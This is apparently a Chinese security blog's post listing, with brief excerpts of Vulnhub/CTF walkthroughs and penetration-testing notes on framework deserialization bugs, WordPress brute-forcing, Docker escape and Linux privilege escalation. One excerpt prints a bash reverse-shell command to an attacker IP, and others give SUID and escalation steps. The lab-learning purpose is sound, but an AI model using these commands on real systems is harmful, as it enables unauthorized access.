- 博客(60)
- 收藏
- 关注
原创 开发框架安全&ThinkPHP&Laravel&SpringBoot&Struts2&SpringCloud&复现
ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架综合工具:武器库-Thinkphp专检(3-6版本)如何判断是TP6框架开发的web程序,基于源码、路径、图标、基于报错可发现dex.php?=xxx在其6.0.13版本及以前=phpinfo()?
2025-07-19 18:02:57
365
原创 服务攻防-Java组件安全&FastJson&高版本JNDI&不出网C3P0&编码绕WAF&写入文件CI链
原创 朝阳2025年07月18日 09:23湖北标题已修改演示环境:FastJson全版本Docker漏洞环境(涵盖1.2.47/1.2.68/1.2.80等版本),主要包括JNDI注入及高版本绕过、waf绕过、文件读写、原生反序列化、利用链探测绕过、不出网利用等。从黑盒的角度覆盖FastJson深入利用。
2025-07-18 15:39:45
660
原创 服务攻防-Java组件安全&数据处理&FastJson&JackSon&XStream&自动BP插件&CVE漏洞
本文分析了Java应用中常见的JSON/XML反序列化漏洞,重点探讨了Jackson、Fastjson和XStream三大组件的安全风险。文章详细列举了各组件的历史漏洞(如CVE-2020-8840、CVE-2021-21351等),并提供了具体的漏洞检测方法:通过Content-Type识别数据格式(application/json或application/xml),利用报错信息判断组件类型,以及构造特定POC进行验证。特别针对JNDI注入攻击场景,给出了包括RMI、LDAP等多种利用方式的payload
2025-07-16 19:01:05
794
原创 vulnhub靶机渗透:PWNLAB: INIT
以下是该代码,我们使用strings查看msg2root,这里有一个/bin/echo %s >> /root/messages.txt。这里是能切换到kane用户的,然后这里有个文件有点可疑 find / -perm -4000 2>/dev/null。这个文件看完了就是只允许上传(".jpg",".jpeg",".gif",".png")四种类型文件,白名单。说是在内联网上上传和共享图片文件,应该是制作图片马,这里不出意外是爆破登录后台然后上传木马了,试试。这里连接一下mysql,查看一下信息。
2025-07-07 17:48:40
718
原创 Vulnhub-TommyBoy1dot0
1、只有tom(大汤姆)有登录的密码 2、有一个 callahanbak.bak 的备份文件,需要你将其重命名为index.html 3、有一个ftp服务,放在一个大多数扫描器都扫不到的端口上,每过15分钟上线 4、nick重置了它的账号为,nickburns sup3rl33t这是nick的密钥。这里重启了几次才能访问wp这个站点,那我们就继续渗透了,然后这个是个wp站,我们扫一下,看看有没有什么信息。淦,看的云里雾里的 这里看了其他师傅wp,说是通过手机访问,那我们就加一个ua头。
2025-06-26 12:17:40
653
原创 vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。
ok,转发成功,这里反弹一个shell,因为这个是docker环境,不能做什么操作 bash -i >& /dev/tcp/192.168.66.129/7777 0>&1 这里出了点问题,就是我的kali端口转发后访问127.0.0.1:8022端口后的页面关闭了之后就再也无法访问了,这里就借鉴其他师傅的wp了。ok,这里扫出来两个端口,一个8000端口一个22端口,我们先看看8000端口有什么东西。ok,这里找到了个ip,应该和上台靶机一样的 老规矩,探测一下内网存活i。怪可爱的,msf的logo。
2025-06-15 17:12:03
419
原创 Web基础-(第三天)Web应用&OSS存储&负载均衡&CDN加速&反向代理&WAF防护&部署影响
本文概述了五种Web安全防护技术的原理与影响:1)Web应用防火墙(WAF)拦截安全测试;2)CDN隐藏源IP导致测试错误;3)OSS云存储使文件解析受限;4)反向代理使访问目标非真实服务器;5)负载均衡导致多目标测试。演示涉及雷池WAF安装、阿里云CDN/OSS配置及Nginx负载均衡,揭示了这些技术在提升安全性和性能的同时,也为渗透测试带来的识别与突破挑战。(149字)
2025-06-14 16:55:39
306
原创 vulnerable_docker_containement(easy难度)Frp、reGeorg隧道搭建内网穿透、docker逃逸、wpscan爆破。教学谈不上,纯技术分享
摘要:本文记录了一次针对Docker容器的渗透测试过程。通过端口扫描发现开放的Docker API(2375端口)和WordPress网站(8000端口)。利用wpscan爆破获取WordPress后台权限后,通过404.php获取初始shell。发现目标为Docker容器后,使用socat建立反向shell,并通过Linpeas脚本进行内网探测。随后使用frp进行内网穿透,发现172.18.0.3的8022端口开放Node.js服务。最后利用Docker Remote API未授权访问漏洞成功逃逸容器获取
2025-06-12 19:49:48
655
原创 Vulnhub_Zico2_wp
该渗透测试过程包括主机发现、端口扫描、目录爆破等步骤,发现目标开放80、22、111等端口。通过弱口令进入adbadmin后台,利用LFI+数据库漏洞创建test.php文件并植入木马,成功获取shell权限。最后利用sudo权限的文件进行提权,通过tarcf命令执行/bin/bash实现root权限获取。整个过程展示了从外网打点到权限提升的完整渗透路径。
2025-05-28 16:55:26
408
原创 破解逆向专辑(二)
1、本专辑灵感源于吾爱破解的yyhd大神,一个从零到一的破解系列,也为了补充一下自己的短板2、使用软件 DIEx64、x64dbg、OD、Immunity Debugger,与原文软件略有不同,因为是比较老版本的文章,这里选择了比较新的主流的软件进行学习3、软件功能 DIEx64,支持64位和32位数,主要进行查壳,并且die也能查询是什么语言写的并且查什么壳,OD分析的是程序的汇编代码。
2025-05-13 10:29:44
1442
原创 破解逆向专辑(一)
这里我们手上有一个机器码验证,无论我们输入什么都是密码错误,我们丢进X64bdg看一下这里的逻辑是这样的,JE;等于则跳转同JZ,既然每次都是登陆失败也就是说每次je条件都是不等于,就是失败的,那我们改成jne或者jnz就是说每次不等于跳转,自然就成功了。
2025-05-07 16:20:13
1585
原创 WebDeveloper 流量分析、sudo提权,靶场通关WP
做到这里我还有一个信息漏掉了,22端口,还没尝试这个端口是干嘛的 这里还是找配置文件 这里爆除了数据库文件。这里来一条shell,这里有个小坑,就是前文已经给了闭合符号记得删除闭合符号即可 还有一件事就是这里不要乱点更新,因为插入php代码再新版本已经删除了,不要乱点!进来了,对编码有点不敏感,最近靶机打的太少了,因该多补补,为什么说我很熟悉wp呢,因为我的博客也是wp搭建的。提权成功,但是我没有安装自己的方式去提权,等后面有时间会把这个坑补上,但也加深了这个提权的方式。这个一眼wp,这个页面没啥东西的。
2025-05-01 19:19:17
601
原创 DC-2寻找Flag1、2、3、4、5,wpscan爆破、git提权
a#使用并添加环境变量,将/bin 作为PATH环境变量导出export PATH=$PATH:/bin/ #将/usr/bin作为PATH环境变量导出export PATH=$PATH:/usr/bin。如果访问重定向报错记得在/etc/hosts中添加ip即可,在windows中的C:/Windows/System32/drivers/etc/HOSTS中添加ip dc-2即可成功。不过这里我们遇到了-rbash,这个含义就是说我们的bash是不完整的,很多命令无法执行,无法操作,我们需要绕过。
2025-04-23 17:06:42
479
原创 Vulnstack 红日安全内网靶场(一)外网打点,内网渗透、横向、提权,mimikatz、CS,一台非常不错的靶机
Vulnstack 红日安全内网靶场(一)外网打点,内网渗透、横向、提权,mimikatz、CS,一台非常不错的靶机
2025-04-23 01:08:21
900
原创 Metasploitable2-Linux。关于老师给了任务,一位彦祖返回家无私奉献,打穿靶场的故事。手搓+msf提权漏洞利用
端口21vsftpd2.3.4笑脸后门漏洞22弱口令23弱口令25 CNNVD-200111-00453 ISC BIND80 http111 rpcbind139/445 smb512 rexec(远程计算机上运行命令)爆破1099 java-rmi1524 bind_shell2049 nfs2121 ftp3306 mysql3632 distccd5432 postgresql5900 vnc6667/6697 irc8009 ajp8180 tomcat示例
2025-04-07 23:22:19
1108
原创 Vulnhub-靶机-Oz。一台让人做呕的靶机,不要换平台打靶机
sqlmap -u "http://192.168.66.133/users" --dbs --batch 这一步我没成功,我从扫描目录哪里就感觉这台靶机有问题,因为users目录没扫出来,后面又是这个sqlmap无法注入,可能需要去htb打吧,不知道咋回事 这里我就截个图,在网上扒一个,下次打htb靶机直接去官网,就不下载下来了 最终账户和密码为:wizard.oz:wizardofoz22。这里我们发现扫描出来的目录回显404,回显200的长度为0,我们用wfuzz扫描返回200长度0的来枚举目录。
2025-04-03 18:53:45
906
原创 《Tr0ll2 靶机渗透实战:弱口令+SUID+两种缓冲区溢出+ 提权完整+fcrackzip暴力破解+shellshock漏洞+脏牛三种root提权复盘》
《Tr0ll2 靶机渗透实战:弱口令+SUID+两种缓冲区溢出+ 提权完整+fcrackzip暴力破解+shellshock漏洞+脏牛三种root提权复盘》
2025-03-27 18:00:48
720
原创 vulnhub-Tr0ll ssh爆破、wireshark流量分析,exp、寻找flag。思维导图带你清晰拿到所以flag
这里有一种思路就是跟着pacp文件走,就是他干了什么我们跟着做或许有收获,当然是因为80端口没信息,可能是兔子窝。这里后来看了wp次啊知道,这东西是访问端口,前四位是ip,第五位乘256加上第六位就是访问的端口。这里我们把这个目录下文件下载下来可以执行,然后多出了一个目录,我们再次访问。爷笑了,他说绝对不是gen哪个密码,靶机最怕这个,谁知道藏了什么东西。这里给爷整笑了,说是包含密码,结果密码是Pass.txt。这里找到了一些文字,没懂,是让我们找这个东西吧。两个文件夹,我们看看有什么信息。
2025-03-21 17:39:54
589
原创 vulnhub-IMF爆肝7小时,绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵
IMF爆肝7小时,绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵。这靶机你就打吧
2025-03-16 20:46:10
1110
原创 BSides-Vancouver-2018 ftp匿名访问、hydra爆破22端口、nc瑞士军刀、提权
BSides-Vancouver-2018 ftp匿名访问、hydra爆破22端口、nc瑞士军刀、提权
2025-03-15 11:48:31
539
原创 vulnhub-Hackme-隧道建立、SQL注入、详细解题、思路清晰。
vulnhub-Hackme-隧道建立、SQL注入、详细解题、思路清晰。
2025-03-14 16:53:52
981
原创 vulnhub-DC-9 SQL注入、“ssh端口敲门”、hydra爆破
vulnhub-DC-9 SQL注入、“ssh端口敲门”、hydra爆破
2025-03-12 17:05:43
750
原创 Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
2025-03-11 20:05:15
836
原创 vulnhub靶场渗透之Stapler 8000字详解,多种方式任你挑选,sql注入、隧道建立、hadry爆破、内核漏洞利用。
vulnhub靶场渗透之Stapler 8000字详解,多种方式任你挑选,sql注入、隧道建立、hadry爆破、内核漏洞利用。
2025-03-07 19:11:29
1231
原创 vulnhub靶场渗透之SickOs1.2渗透教程,计划任务提权、chkrootkit提权
vulnhub靶场渗透之SickOs1.2渗透教程,计划任务提权、chkrootkit提权
2025-03-07 10:37:42
614
原创 *VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势
*VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势
2025-03-06 18:34:51
682
原创 靶场之路-VulnHub-DC-6 nmap提权、kali爆破、shell反连
靶场之路-VulnHub-DC-6 nmap提权、kali爆破、shell反连
2025-03-05 10:13:18
1043
原创 靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root
说实话,最后提权用nc有点绕、抽象,但是相比之前打靶机确实有很大进步,得把反弹shell语法记住,这个很关键,nc也得再精进一点,这东西是真好用,砍瓜切菜很顶。
2025-03-04 00:04:21
580
原创 靶场之路-Kioptix Level-4 SQL注入、udf提权、shell逃逸、受限shell绕过实战详细记录,不踩坑、不踩雷、顺顺利利打完靶,快点进来享受。
靶场之路-Kioptix Level-4 SQL注入、udf提权、shell逃逸、受限shell绕过实战详细记录,不踩坑、不踩雷、顺顺利利打完靶,快点进来享受。
2025-02-26 13:00:20
397
原创 靶场之路-Kioptix Level-2 渗透之路不可或缺的经验宝宝,赶紧点进来开始享受。详细打靶流程,替你踩坑。
靶场之路-Kioptix Level-2 渗透之路不可或缺的经验宝宝,赶紧点进来开始享受。详细打靶流程,替你踩坑。
2025-02-24 18:55:40
689
原创 渗透之路-传输文件之烧套路(二十六)
暴肝14小时实操、解析windows到kali、kali到windows文件传输,帮你踩过无数坑!收藏下来日后成为你的渗透利器!简介: 文件传输是渗透的一般流程,在这里,我们或多或少要向目标机器传输一些文件 流程: 权限提升 - 扩大控制 - 横向移动 -安装后门 -清理痕迹 - 上传工具文件,ok,废话少说我们直接上干货
2025-02-24 00:17:51
1167
原创 靶场之路-Kioptix Level-1 mod_ssl 缓冲区溢出漏洞
NFS 与 samba 一样,也是在网络中实现文件共享的一种实现,但不支持 windows 平台,samba 是能够在任何支持 SMB 协议的主机之间共享文件的一种实现,当然也包括 windows。其次把打靶的流程也熟悉了一遍包括工具的使用,对于我这个喜欢啃书本的人来说,实战是非常有冲击感的,希望以此为始来见证我的渗透之路,走着。这里我们还是要设定参数的,首先我们选择了探测smaba版本的工具,输入options然后设置探测端口,再运行,我们得到了smaba版本号是2.2.1a。
2025-02-22 19:49:54
1055
原创 泷羽Sec-蓝队基础之网络七层杀伤链
IAM是任何安全程序的基础,也是黑客攻击的主要目标。此外,还有非SQL数据库如MongoDB、Redis、Azure CosmosDB和AWS DynamoDB等,它们提供了不同的数据存储和查询方式以满足企业的多样化需求。ISO27001标准提供了一种基于控制方法的审计和认证框架,而NIST网络安全框架则更注重预防和应对网络攻击,包括识别、保护、检测、响应和恢复五个阶段。此外,随着物联网技术的发展,楼宇管理和工控网络日志也成为了重要的日志来源,这些系统现在通常连接到企业网络,并可能成为攻击者的主要目标。
2025-02-20 13:52:55
536
原创 泷羽Sec-超文本协议与内外网划分
302 Found:表示请求资源临时被移到另一个URL,客户端应继续使用原有的URL,进行请求,但可以根据响应中的Location头部字段重定向。特点:POST请求的数据通常放在请求体中,而不是URL中,因此可以传输大量数据,并且相对安全,不易暴露敏感信息。GET请求的参数通常附加在URL中,这使得它们可以被轻松地分享和书签,但也可能会暴露敏感信息,并且有长度限制。管道化(Pipelining),客户端可以在一个连接上连续发送多个请求,但服务的响应顺序碧玺与请求顺序一致。用途:用于请求指定的资源。
2025-02-19 16:54:40
952
原创 泷羽Sec-黑客基础之html(超文本标记语言)
HTML(超文本标记语言)是用于创建网页的标准语言。它通过标签定义网页内容,比如标题、段落、图片和链接。HTML文档由<html><head>和<body>组成,是网页的基础结构。简单易学,是前端开发的入门必备!🚀。
2025-02-19 15:58:37
520
原创 渗透测试之 -- linux基础之病毒编写(完结)
包含二进制可执行文件。在单用户模式下,你需要使用的常见Linux命令都位于此目录下系统的所有用户使用的命令都设在这里。
2024-11-24 19:20:26
833
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人